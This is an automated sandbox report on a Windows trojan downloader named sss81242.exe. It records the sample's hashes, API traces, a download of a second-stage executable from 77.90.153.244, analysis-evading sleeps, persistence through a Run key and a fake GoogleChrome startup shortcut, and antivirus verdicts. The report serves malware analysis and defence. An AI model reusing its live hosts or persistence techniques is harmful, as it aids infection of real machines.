Summary | ZeroBOX

sss81242.exe

Suspicious_Script Generic Malware Malicious Library UPX GIF Format Lnk Format PE64 PE File OS Processor Check PE32 BMP Format ZIP Format icon
Category Machine Started Completed
FILE s1_win7_x6401 March 17, 2025, 9:39 a.m. March 17, 2025, 10:02 a.m.
Size 251.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 58d3a0d574e37dc90b40603f0658abd2
SHA256 dcc05c3ac7ae22d601bcb7c97cfcda568f3041bd39b2fd8899282dfde83369a5
CRC32 845647D0
ssdeep 6144:fo5FKmVjbskNWDV6wyZYbn5tMfWsfTx2n83Oixf:k8CskNiV6yo7eixf
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
77.90.153.244 Active Moloch
77.90.153.245 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
gthsexgyz6vks34e+0x1c207 @ 0x13feac207
gthsexgyz6vks34e+0x92bb @ 0x13fe992bb
gthsexgyz6vks34e+0x182ac @ 0x13fea82ac
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 44 0f b7 01 44 2b c0 75 19 48 2b ca 66 85 c0 74
exception.symbol: gthsexgyz6vks34e+0x1c207
exception.instruction: movzx r8d, word ptr [rcx]
exception.module: gThseXGYz6VkS34E.exe
exception.exception_code: 0xc0000005
exception.offset: 115207
exception.address: 0x13feac207
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 1462631425
registers.rbx: 0
registers.rsp: 2948320
registers.r11: 254
registers.r8: 1435944852
registers.r9: 4294967295
registers.rdx: 5367399388
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 75
registers.r13: 0
1 0 0
suspicious_features Connection to IP address suspicious_request GET http://77.90.153.244/l9543.exe
request GET http://77.90.153.244/l9543.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000004900000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description aib0Q1C72l45FOvW.exe tried to sleep 1005 seconds, actually delayed analysis time by 1005 seconds
description NXonNmvE9cRRFfxL.exe tried to sleep 1135 seconds, actually delayed analysis time by 1135 seconds
description cHR8R5ijyj1Ic1Y9.exe tried to sleep 964 seconds, actually delayed analysis time by 964 seconds
description yXZJ2Z1iWleuXExA.exe tried to sleep 317 seconds, actually delayed analysis time by 317 seconds
description f7clVsTKgBeGBZm1.exe tried to sleep 855 seconds, actually delayed analysis time by 855 seconds
description Di940XWRk4TvkcIn.exe tried to sleep 390 seconds, actually delayed analysis time by 390 seconds
description z1yeYXhNXfWOcn4u.exe tried to sleep 787 seconds, actually delayed analysis time by 787 seconds
description NJzn2Uzi0Eo8JgrZ.exe tried to sleep 526 seconds, actually delayed analysis time by 526 seconds
description gV47SdjcEzTDlUBt.exe tried to sleep 788 seconds, actually delayed analysis time by 788 seconds
description qVHqqCmUJT4LLZxK.exe tried to sleep 232 seconds, actually delayed analysis time by 232 seconds
description 0STUp9LWMUPLvYAo.exe tried to sleep 1185 seconds, actually delayed analysis time by 1185 seconds
description vpZvQeDoVnhQnT6u.exe tried to sleep 155 seconds, actually delayed analysis time by 155 seconds
description xqIyPU1Pncvy4Wif.exe tried to sleep 396 seconds, actually delayed analysis time by 396 seconds
description Im8VwB4YUvmJZae6.exe tried to sleep 549 seconds, actually delayed analysis time by 549 seconds
description YkHscCZsekqgi3Ns.exe tried to sleep 652 seconds, actually delayed analysis time by 652 seconds
file C:\Users\test22\AppData\Local\Temp\dRA90OLc\gThseXGYz6VkS34E.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file C:\Users\test22\AppData\Local\Temp\sss81242.exe
file C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† õ}Õgð" œÞƒ@p `x,(€´àhà±@/h.text§šœ `.rdata œ°ž¢@@.data@ P @@À.pdata´€L@@.gxfgà b@@.retplneŒÀv_RDATAôÐx@@.relochàz@B.bsszðz‚@ÀAWAVAUATVWUSHìˆH‹æ@H1àH‰„$€‰T$tH‰L$hÇD$d•éÑ[ÇD$`‹T$tH‹L$h‰T$,èð‹T$,ƒòÿâ«[ÅaA¸ÿÿÿÿE‰ÁAñ«[ÅaD‹T$,E!ÊE‰ÃAóÿÿÿÿAã«[ÅaAáÿÿÿÿD ÒE ËD1ڃòÿA‰ÁA1ÑA!Á‰ÂƒòÿâÈùÅ;E‰ÂAòÈùÅ;D!ÐAðÿÿÿÿAàÈùÅ;Aâÿÿÿÿ ÂE ÐD1ƒòÿ‹D$,1ЋT$,!ÐE‰ÈA!ÀA1ÁE ÈD‰D$\H‹L$hèOH‰D$PH‹L$hè0HÁè‰D$LÇD$HÇD$0 w_†‹D$0‰Áé w_†‰D$(„^é‹D$(-,õ‘”„žé‹D$(-Áçȸ„½é‹D$(-Ù{`Á„ü é‹D$(-R†É„é‹D$(-•à„é‹D$(-˜øRó„z é‹D$(-Qrù„dé‹D$(-¤Ë „Åé‹D$(-6„w é‹D$(-Ž˜ì$„) é‹D$(-ZXŸ)„Cé‹D$(-J¹§0„ é‹D$(-;á`„ûé‹D$(-Äkb„zé‹D$(-ƒËœh„sé‹D$(-riu„Ié‹D$(-]g‡„»é韋D$H;D$L¸•à¹ÁçȸLȉL$0é1À‹ FI‹DIA‰ÈAè¬XØUAèßz1§AÀ¬XØUƒèAÀAÀÿòïAÀßz1§AèÿòïA¯ÈƒáƒùA”Áƒú AœÂEˆËA€óÿDˆÓ€óÿ@¶@ˆ÷@€÷AÛ@€ÏA€óÿA ûDˆË€óÿDˆ×@ ßA€òÿE ÑDÏEˆÙA€ñÿAˆúA€òÿ@€öDˆË€ãÿA óDˆÕ@€åÿ@ ÷DÛ@ý@0ëEÑA€ñÿ@€ÎA ñDËöø¤Ë ¹riuEȉL$0é˜1ÀH‹L$P‹T$HÁâLcÂB‹‰T$DiT$D•éÑ[‰T$D‹T$DÁêD‹L$DE‰ÊAƒòÿAâÿÿÿÿA»ÿÿÿÿD‰ÞöÿÿÿÿD‰Ï!÷A úAƒòÿ‰ÖD1Ö!ÖA‰ÒAƒòÿAâÿÿÿÿD‰ß÷ÿÿÿÿ!úA ÒAƒñÿAƒòÿD‰ÚòâóYrE сÊâóYrAƒñÿA!щòD!ÊD1Î ò‰T$DiT$D•éÑ[‰T$DiT$\•éÑ[‰T$\‹T$DD‹L$\E‰ÊAƒòÿAâÿÿÿÿD‰ÞöÿÿÿÿD‰Ï!÷A ú‰ÖƒöÿAƒòÿD‰ß÷n‘îD ցÏn‘îƒöÿ!þA‰ÒAƒòÿAâÿÿÿÿD‰ß÷ÿÿÿÿ!úA ÒAƒòÿD‰ÊD1ÒD!ÊA‰ñAƒñÿA‰ÒAƒòÿAóï ‹ùD‰Ïçï ‹ùD!ÞD‰Óãï ‹ùD!Ú ÷ Ó1ßE ÑAƒñÿAËï ‹ùE!ÙD ω|$\‹ßFD‹ ÜFA‰ÂAêcåhgA‰ÓE)ӃèAÃAÃù¥NEAëcåhgAëù¥NEA¯Óƒâƒú@”ÅAƒù AœÆEˆ÷A€÷ÿAˆìE0üA ìAˆïA€÷ÿA€çAµA€õD íDˆð4ÿ$E îAïDðA0ÇDˆàD øE0üD਺ÄkbA¹riuDEÊD‰L$0ékÇD$0ƒËœhé^1À‹L$Hºt·ý ƒÂ)ʁêt·ý ‰Áé×ü!#ƒéÁ×ü!#A‰ÀA)ÈD)Â)ЃÀ‰D$HÇD$0 w_†éH‹D$P‹L$LÁáHcÑHÐH‰D$8ÇD$4H‹L$hèôHÇÁÿÿÿÿH‰ÊHòHâÿÿÿÿI‰ÈIðÿÿÿÿIàL ÂI‰ÀIðÿÿÿÿI¹‘>ìŠÿâN‹M!ÈI‰ÊM1ÊI‰ÃM!ÓH‰ÖHöÿÿÿÿL!ÎL!ÒM ØH ÖI1ðIðÿÿÿÿH5ÿÿÿÿHºÖ㺽ìtà H1ÑI ÀH ÑIðÿÿÿÿI!ÈL‰D$xÇD$0,õ‘”éKH‹D$xHƒø¹QrùºR†ÉLщT$0é,H‹D$xHƒø¹Ù{`Áº]g‡LщT$0é H‹D$xHƒø¹˜øR󺎘ì$DщT$0éî1À‹ ³D‹±DA‰ÈAèŠjzòAèŒ×BAÀŠjzòA‰ÁAƒéEÈA‰ÁE)ÁA‰ÀAèŒ×BEÁD)ȯȃáƒùA”ƒú AœÃDˆÛ€óÿDˆÖ@0ÞD ÖDˆÓ€óÿ€ã@·@ˆý@€õA êEˆÞA€öÿA€æÿA ëDÓEÞD0óAˆòA€òÿAˆÛA€óÿ@€÷DˆÕ@€åÿ@ þEˆÞA€æÿ@ û@õAÞD0õEÚA€òÿ@€ÏA úDÕ@öŸ;á`¹ZXŸ)EȉL$0éþ H‹D$8¾HÁá‹T$4A‰ÐAƒðÿAàdÏ$ÈA¹ÿÿÿÿE‰ÊAòdÏ$ÈA‰ÓE!ÓD‰ÎöÿÿÿÿædÏ$ÈAâÿÿÿÿE ØD ÖA1ðA‰ÊAƒòÿAƒðÿE‰ËAó ¯ÉE ÂAË ¯ÉAƒòÿE!ÚA‰ÈAƒðÿAàÿÿÿÿAñÿÿÿÿD!ÉA ÈAƒðÿ‰ÑD1Á!ÑD‰Ò!ÊA1ÊD ҉T$4‹ C‹CA‰ÈAÀj¨ gAè¢Âq¥Aèj¨ gAÀcáEdAƒèAècáEdAè¨óÇAÀ¢Âq¥AÀ¨óÇA¯Èƒáƒù”Ãú @œÇ@ˆÝ@€õÿ@€åA¶Eˆ÷A€÷AˆÜE üEˆõA€õA€åÿA€çDåEýD0íAˆÿA€÷ÿA€çEˆôA€ôAˆýE åDˆð4$A€äEïDàA0ÇDˆð4$EˆôA€ôEˆåA€åDˆñ€ñ€áA€äDèDá0È@ˆé€ñÿEˆôA€ôEˆõA€õDáA€Í€ñÿD éAˆÄA€ôÿAˆÝE0
request_handle: 0x00cc000c
1 1 0
process aib0q1c72l45fovw.exe
process nxonnmve9crrffxl.exe
process sss81242.exe
process pmimfrnhbhgq9xqy.exe
process di940xwrk4tvkcin.exe
process z1yeyxhnxfwocn4u.exe
process njzn2uzi0eo8jgrz.exe
process gv47sdjceztdlubt.exe
process im8vwb4yuvmjzae6.exe
process gi8geoigs8qhmajy.exe
process alpspiz52akc9xpx.exe
process 0stup9lwmuplvyao.exe
process vsoifcvryt3cw1za.exe
process qvhqqcmujt4llzxk.exe
process ldlnyw79i6tmcew3.exe
process oniayhqzco1lxubc.exe
process chr8r5ijyj1ic1y9.exe
process yxzj2z1iwleuxexa.exe
process f7clvstkgbegbzm1.exe
process xqiypu1pncvy4wif.exe
process jbvqkg4nbz7qj9av.exe
process pkf3awcjxtmplg04.exe
process pyh3os4hvcklb6ee.exe
process jbf2ecdgvte5mgyp.exe
process 0hzyrwhxommroptc.exe
process xgt8fijj9xtpzvbr.exe
process ykhscczsekqgi3ns.exe
host 77.90.153.244
host 77.90.153.245
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GoogleChrome reg_value C:\Users\test22\AppData\Local\Temp\H7lidFjN\vpZvQeDoVnhQnT6u.exe
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk
file C:\Users\test22\AppData\Local\Temp\NJzn2Uzi0Eo8JgrZ.exe
file C:\Users\test22\AppData\Local\Temp\0STUp9LWMUPLvYAo.exe
file C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt
file C:\Users\test22\AppData\Local\Temp\NJzn2Uzi0Eo8JgrZ.exe
file C:\Users\test22\AppData\Local\Temp\vsoIfCvryt3cW1ZA.exe
file C:\Users\test22\AppData\Local\Temp\tmpfcimyk
file C:\Users\test22\AppData\Local\Temp\Di940XWRk4TvkcIn.exe
file C:\Users\test22\AppData\Local\Temp\cHR8R5ijyj1Ic1Y9.exe
file C:\Users\test22\AppData\Local\Temp\seJrfTgW2l6OVW78.exe
file C:\Users\test22\AppData\Local\Temp\tmpv0u7lo
file C:\Users\test22\AppData\Local\Temp\Im8VwB4YUvmJZae6.exe
file C:\Users\test22\AppData\Local\Temp\xqIyPU1Pncvy4Wif.exe
file C:\Users\test22\AppData\Local\Temp\PyH3oS4HVckLB6EE.exe
file C:\Users\test22\AppData\Local\Temp\tmpnc7lwr
file C:\Users\test22\AppData\Local\Temp\aib0Q1C72l45FOvW.exe
file C:\Users\test22\AppData\Local\Temp\z1yeYXhNXfWOcn4u.exe
file C:\Users\test22\AppData\Local\Temp\tmpq6yfmb
file C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file C:\Users\test22\AppData\Local\Temp\java_install_reg.log
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log
file C:\Users\test22\AppData\Local\Temp\dd_dotnet4.5_decompression_log.txt
file C:\Users\test22\AppData\Local\Temp\sss81242.exe
file C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log
file C:\Users\test22\AppData\Local\Temp\jawshtml.html
file C:\Users\test22\AppData\Local\Temp\~DFB8537D6963ECB123.TMP
file C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log
file C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000013.log
file C:\Users\test22\AppData\Local\Temp\tmpaddon-1
file C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt
file C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00001.log
file C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log
file C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log
file C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log
file C:\Users\test22\AppData\Local\Temp\RGI1518.tmp-tmp
file C:\Users\test22\AppData\Local\Temp\DMI9EEF.tmp
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000017.log
file C:\Users\test22\AppData\Local\Temp\chrome_installer.log
file C:\Users\test22\AppData\Local\Temp\UserInfoSetup(20180405152131B24).log
file C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 KOR Language Pack Setup_20200715_141443571.html
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000020.log
file C:\Users\test22\AppData\Local\Temp\RGIC87.tmp-tmp
file C:\Users\test22\AppData\Local\Temp\java_install.log
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000007.log
file C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file C:\Users\test22\AppData\Local\Temp\bchC68D.tmp
file C:\Users\test22\AppData\Local\Temp\Microsoft .NET Framework 4.5 Setup_20200715_141303844.html
file C:\Users\test22\AppData\Local\Temp\PrinterSetup.log
file C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00002.log
file C:\Users\test22\AppData\Local\Temp\dd_TMPA86C.tmp_decompression_log.txt
Lionic Trojan.Win32.BackdoorX.m!c
MicroWorld-eScan Gen:Variant.Doina.84317
CTX exe.trojan.generic
Skyhigh BehavesLike.Win32.Downloader.dh
ALYac Gen:Variant.Doina.84317
Cylance Unsafe
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
K7GW Trojan ( 005c36431 )
K7AntiVirus Trojan ( 005c36431 )
Arcabit Trojan.Doina.D1495D
Symantec Trojan.Whispergate
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/Agent.AHAN
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Alibaba Trojan:Win32/BackdoorX.71a23315
Rising Backdoor.Convagent!8.123DC (CLOUD)
Sophos Mal/Generic-S
F-Secure Trojan.TR/AD.Nekark.vsdpm
DrWeb Trojan.MulDrop29.26479
VIPRE Gen:Variant.Doina.84317
McAfeeD Real Protect-LS!58D3A0D574E3
Emsisoft Gen:Variant.Doina.84317 (B)
SentinelOne Static AI - Malicious PE
FireEye Generic.mg.58d3a0d574e37dc9
Google Detected
Avira TR/AD.Nekark.vsdpm
Antiy-AVL Trojan/Win32.Agent
Gridinsoft Ransom.Win32.Wacatac.sa
Microsoft Trojan:Win32/Wacatac.B!ml
GData Gen:Variant.Doina.84317
Varist W32/ABTrojan.APOM-5687
AhnLab-V3 Trojan/Win.Doina.C5740788
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.4210650245
Ikarus Trojan.Win32.Agent
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9V
Tencent Win32.Backdoor.Pmax.Hmnw
huorong Trojan/Agent.cca
MaxSecure Trojan.Malware.300983.susgen
Fortinet Malicious_Behavior.SB
Panda Trj/Chgt.AD
alibabacloud Backdoor:Win/PMax.gyf